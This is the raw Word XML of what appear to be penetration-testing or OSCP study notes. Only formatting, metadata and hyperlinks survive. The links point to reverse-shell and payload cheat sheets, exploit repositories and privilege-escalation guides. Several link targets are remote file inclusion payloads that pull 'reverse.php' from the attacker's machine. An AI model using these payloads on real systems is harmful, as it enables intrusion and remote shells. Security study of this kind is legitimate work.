          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E21C2">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:t>https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1097814569</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD5AEA1" w14:textId="4399447C" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69E51566" w14:textId="1472C76B" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="125913CA" w14:textId="7E58DD88" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3237B09B" w14:textId="1D7EEA13" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E6A47C" w14:textId="3340EAC3" w:rsidR="008E21C2" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7AF9C7" w14:textId="77777777" w:rsidR="008E21C2" w:rsidRPr="00FC4479" w:rsidRDefault="008E21C2" w:rsidP="00FC4479">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="008E21C2" w:rsidRPr="00FC44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B5AAC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F09E8C4C"/>
    <w:lvl w:ilvl="0" w:tplc="91DC525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F018DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6388DB04"/>
    <w:lvl w:ilvl="0" w:tplc="E5D6CEE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033854"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2256C022"/>
    <w:lvl w:ilvl="0" w:tplc="87A66898">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="408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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7A317AA6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FA18FA04"/>
    <w:lvl w:ilvl="0" w:tplc="85DE10E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12E"/>
    <w:rsid w:val="00004AB3"/>
    <w:rsid w:val="000245EB"/>
    <w:rsid w:val="000276A6"/>
    <w:rsid w:val="00034E76"/>
    <w:rsid w:val="0004548B"/>
    <w:rsid w:val="00063C99"/>
    <w:rsid w:val="00065E93"/>
    <w:rsid w:val="0007511D"/>
    <w:rsid w:val="000952E2"/>
    <w:rsid w:val="000B0158"/>
    <w:rsid w:val="000C7912"/>
    <w:rsid w:val="000F13BF"/>
    <w:rsid w:val="000F227B"/>
    <w:rsid w:val="001023D8"/>
    <w:rsid w:val="00104D40"/>
    <w:rsid w:val="001228FB"/>
    <w:rsid w:val="00130DA7"/>
    <w:rsid w:val="00133001"/>
    <w:rsid w:val="0014075C"/>
    <w:rsid w:val="00146D5B"/>
    <w:rsid w:val="00160F4F"/>
    <w:rsid w:val="001652D4"/>
    <w:rsid w:val="0017092D"/>
    <w:rsid w:val="00175BD9"/>
    <w:rsid w:val="001841D1"/>
    <w:rsid w:val="0018435B"/>
    <w:rsid w:val="00190567"/>
    <w:rsid w:val="00191B6C"/>
    <w:rsid w:val="00197698"/>
    <w:rsid w:val="001A1743"/>
    <w:rsid w:val="001B5C90"/>
    <w:rsid w:val="001C203F"/>
    <w:rsid w:val="001C66D6"/>
    <w:rsid w:val="001D418B"/>
    <w:rsid w:val="00216231"/>
    <w:rsid w:val="002204C0"/>
    <w:rsid w:val="00223BCB"/>
    <w:rsid w:val="00223FAA"/>
    <w:rsid w:val="00227D14"/>
    <w:rsid w:val="00230716"/>
    <w:rsid w:val="002336CD"/>
    <w:rsid w:val="00243D58"/>
    <w:rsid w:val="00247551"/>
    <w:rsid w:val="002573FB"/>
    <w:rsid w:val="0028111A"/>
    <w:rsid w:val="00281442"/>
    <w:rsid w:val="002A311E"/>
    <w:rsid w:val="002B1E62"/>
    <w:rsid w:val="002C12DA"/>
    <w:rsid w:val="002E4531"/>
    <w:rsid w:val="002E7A38"/>
    <w:rsid w:val="002F38F6"/>
    <w:rsid w:val="002F6638"/>
    <w:rsid w:val="003105D3"/>
    <w:rsid w:val="00311F1C"/>
    <w:rsid w:val="00346F55"/>
    <w:rsid w:val="003471D6"/>
    <w:rsid w:val="003560E3"/>
    <w:rsid w:val="003578B9"/>
    <w:rsid w:val="00376239"/>
    <w:rsid w:val="003878B2"/>
    <w:rsid w:val="003927A0"/>
    <w:rsid w:val="003975A9"/>
    <w:rsid w:val="003B4B3B"/>
    <w:rsid w:val="003C2B5C"/>
    <w:rsid w:val="00416EB5"/>
    <w:rsid w:val="00422553"/>
    <w:rsid w:val="004235AA"/>
    <w:rsid w:val="00436E48"/>
    <w:rsid w:val="0044279E"/>
    <w:rsid w:val="004432FF"/>
    <w:rsid w:val="00462C8A"/>
    <w:rsid w:val="00476BDA"/>
    <w:rsid w:val="00487EEB"/>
    <w:rsid w:val="004A183D"/>
    <w:rsid w:val="004E6F2F"/>
    <w:rsid w:val="00517B0E"/>
    <w:rsid w:val="00543E30"/>
    <w:rsid w:val="0055113D"/>
    <w:rsid w:val="005570D7"/>
    <w:rsid w:val="00565FCF"/>
    <w:rsid w:val="0059023C"/>
    <w:rsid w:val="0059054C"/>
    <w:rsid w:val="005A0CF4"/>
    <w:rsid w:val="005B627C"/>
    <w:rsid w:val="005C139E"/>
    <w:rsid w:val="005C2177"/>
    <w:rsid w:val="005C60A3"/>
    <w:rsid w:val="005C646D"/>
    <w:rsid w:val="005D48A3"/>
    <w:rsid w:val="005E3E6E"/>
    <w:rsid w:val="00602485"/>
    <w:rsid w:val="0061112E"/>
    <w:rsid w:val="00615F1C"/>
    <w:rsid w:val="00620D5B"/>
    <w:rsid w:val="00622BE2"/>
    <w:rsid w:val="00636528"/>
    <w:rsid w:val="00643996"/>
    <w:rsid w:val="00645E91"/>
    <w:rsid w:val="006535B2"/>
    <w:rsid w:val="0067609B"/>
    <w:rsid w:val="0068185A"/>
    <w:rsid w:val="00686CBC"/>
    <w:rsid w:val="00690F4F"/>
    <w:rsid w:val="00697558"/>
    <w:rsid w:val="006B0CDE"/>
    <w:rsid w:val="006B33D6"/>
    <w:rsid w:val="006C6ECD"/>
    <w:rsid w:val="006C78E6"/>
    <w:rsid w:val="006D0807"/>
    <w:rsid w:val="006D3502"/>
    <w:rsid w:val="006D7F1B"/>
    <w:rsid w:val="006E31FF"/>
    <w:rsid w:val="006F289C"/>
    <w:rsid w:val="007255C9"/>
    <w:rsid w:val="00727A6E"/>
    <w:rsid w:val="00730F09"/>
    <w:rsid w:val="00737A11"/>
    <w:rsid w:val="007527E4"/>
    <w:rsid w:val="00755B27"/>
    <w:rsid w:val="00760FFE"/>
    <w:rsid w:val="00763C98"/>
    <w:rsid w:val="0078632C"/>
    <w:rsid w:val="00795EB5"/>
    <w:rsid w:val="007A131C"/>
    <w:rsid w:val="007B3940"/>
    <w:rsid w:val="007C5EC6"/>
    <w:rsid w:val="007D5734"/>
    <w:rsid w:val="007E3E88"/>
    <w:rsid w:val="00812283"/>
    <w:rsid w:val="00816F6D"/>
    <w:rsid w:val="00821FA4"/>
    <w:rsid w:val="008264D1"/>
    <w:rsid w:val="00832BD2"/>
    <w:rsid w:val="008416D5"/>
    <w:rsid w:val="008432DE"/>
    <w:rsid w:val="008571B5"/>
    <w:rsid w:val="008617E5"/>
    <w:rsid w:val="00890836"/>
    <w:rsid w:val="00890A35"/>
    <w:rsid w:val="0089430B"/>
    <w:rsid w:val="008B378C"/>
    <w:rsid w:val="008C0DCF"/>
    <w:rsid w:val="008C18FB"/>
    <w:rsid w:val="008C3C8B"/>
    <w:rsid w:val="008E21C2"/>
    <w:rsid w:val="008E7174"/>
    <w:rsid w:val="008F70FF"/>
    <w:rsid w:val="00900340"/>
    <w:rsid w:val="00900AB2"/>
    <w:rsid w:val="009034B0"/>
    <w:rsid w:val="00912D81"/>
    <w:rsid w:val="00915E3B"/>
    <w:rsid w:val="009409DE"/>
    <w:rsid w:val="0094432F"/>
    <w:rsid w:val="0095586B"/>
    <w:rsid w:val="009608A8"/>
    <w:rsid w:val="00974BC7"/>
    <w:rsid w:val="00976BF6"/>
    <w:rsid w:val="00986D8F"/>
    <w:rsid w:val="00996F9B"/>
    <w:rsid w:val="009A4488"/>
    <w:rsid w:val="009A63AC"/>
    <w:rsid w:val="009C5C5F"/>
    <w:rsid w:val="009E142B"/>
    <w:rsid w:val="009E15DA"/>
    <w:rsid w:val="009E18E8"/>
    <w:rsid w:val="009F3E73"/>
    <w:rsid w:val="00A57D8C"/>
    <w:rsid w:val="00A7576B"/>
    <w:rsid w:val="00A915EB"/>
    <w:rsid w:val="00AA389A"/>
    <w:rsid w:val="00AC2BD0"/>
    <w:rsid w:val="00AE3331"/>
    <w:rsid w:val="00AE5F61"/>
    <w:rsid w:val="00AF291B"/>
    <w:rsid w:val="00B113E2"/>
    <w:rsid w:val="00B352C2"/>
    <w:rsid w:val="00B35920"/>
    <w:rsid w:val="00B43F00"/>
    <w:rsid w:val="00B44D1C"/>
    <w:rsid w:val="00B479C0"/>
    <w:rsid w:val="00B56640"/>
    <w:rsid w:val="00B7438A"/>
    <w:rsid w:val="00B871A8"/>
    <w:rsid w:val="00BB5DA5"/>
    <w:rsid w:val="00BD3D38"/>
    <w:rsid w:val="00BE401C"/>
    <w:rsid w:val="00BF634D"/>
    <w:rsid w:val="00C05C24"/>
    <w:rsid w:val="00C0738B"/>
    <w:rsid w:val="00C11751"/>
    <w:rsid w:val="00C1475B"/>
    <w:rsid w:val="00C17765"/>
    <w:rsid w:val="00C37294"/>
    <w:rsid w:val="00C626EE"/>
    <w:rsid w:val="00C70BBF"/>
    <w:rsid w:val="00C85350"/>
    <w:rsid w:val="00C92A64"/>
    <w:rsid w:val="00CA7D91"/>
    <w:rsid w:val="00CB2C86"/>
    <w:rsid w:val="00CB34A1"/>
    <w:rsid w:val="00CB7BFD"/>
    <w:rsid w:val="00CC2ECE"/>
    <w:rsid w:val="00CC6492"/>
    <w:rsid w:val="00CD2143"/>
    <w:rsid w:val="00CE1AB4"/>
    <w:rsid w:val="00D03CC8"/>
    <w:rsid w:val="00D0440D"/>
    <w:rsid w:val="00D1177F"/>
    <w:rsid w:val="00D46982"/>
    <w:rsid w:val="00D47DB7"/>
    <w:rsid w:val="00D8068E"/>
    <w:rsid w:val="00D87076"/>
    <w:rsid w:val="00DB16BD"/>
    <w:rsid w:val="00DB5C1C"/>
    <w:rsid w:val="00DE0A6B"/>
    <w:rsid w:val="00DE1C11"/>
    <w:rsid w:val="00E0332B"/>
    <w:rsid w:val="00E20049"/>
    <w:rsid w:val="00E203BD"/>
    <w:rsid w:val="00E37457"/>
    <w:rsid w:val="00E41059"/>
    <w:rsid w:val="00E435F3"/>
    <w:rsid w:val="00E46EAB"/>
    <w:rsid w:val="00E61B3A"/>
    <w:rsid w:val="00E733E7"/>
    <w:rsid w:val="00E900DD"/>
    <w:rsid w:val="00EB1FA8"/>
    <w:rsid w:val="00EB6DAC"/>
    <w:rsid w:val="00EC2F68"/>
    <w:rsid w:val="00ED0C7A"/>
    <w:rsid w:val="00ED2914"/>
    <w:rsid w:val="00EF189B"/>
    <w:rsid w:val="00F14730"/>
    <w:rsid w:val="00F223FB"/>
    <w:rsid w:val="00F228AC"/>
    <w:rsid w:val="00F56B6C"/>
    <w:rsid w:val="00F722E4"/>
    <w:rsid w:val="00F977B4"/>
    <w:rsid w:val="00FA7E72"/>
    <w:rsid w:val="00FB1B03"/>
    <w:rsid w:val="00FC4479"/>
    <w:rsid w:val="00FD44E6"/>
    <w:rsid w:val="00FF5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37212"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3DD8291D-F9E9-400D-8F06-3C7016BA4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E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5E3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878B2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15E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E3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15E3B"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
      <w:color w:val="5A5A5A" w:themeColor="text1" w:themeTint="A5"/>
      <w:spacing w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00915E3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B56640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5C646D"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Emphasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="005C646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915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915EB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95586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5586B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DB16B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570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cm-variable">
    <w:name w:val="cm-variable"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005570D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-operator">
    <w:name w:val="cm-operator"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005570D7"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="cm-string">
    <w:name w:val="cm-string"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005570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61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6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2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4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68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2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6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1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51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23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9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83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9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33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9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11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7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99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9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08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8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00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5.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/abatchy17/WindowsExploits" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://forum.hackthebox.com/t/a-script-kiddie-s-guide-to-passing-oscp-on-your-first-attempt/1471" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-abusing-tokens" TargetMode="Externa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://URL?param=http://%3cmymachine%3e/reverse.php" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14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jwt.io/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://URL?param=FUZZ" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://infinitelogins.com/2020/01/25/msfvenom-reverse-shell-payload-cheatsheet/" TargetMode="External"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://URL?param=http://%3cmymachine%3e/reverse.php%00" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.securityidiots.com/Web-Pentest/SQL-Injection/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cobalt.io/blog/a-pentesters-guide-to-sql-injection-sqli" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://URL?param=http://%3cmymachine%3e/reverse.php" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8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hyperlink" Target="file:///\\$LHOST\shae" TargetMode="Externa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hyperlink" Target="https://gtfobins.github.io/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file://c:/windows/system32/cmd.exe" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet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46877</TotalTime>
  <Pages>25</Pages>
  <Words>4259</Words>
  <Characters>24282</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>202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Mcclymont</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Tom Mcclymont</cp:lastModifiedBy>
  <cp:revision>35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-11-30T12:44:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-01-17T21:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>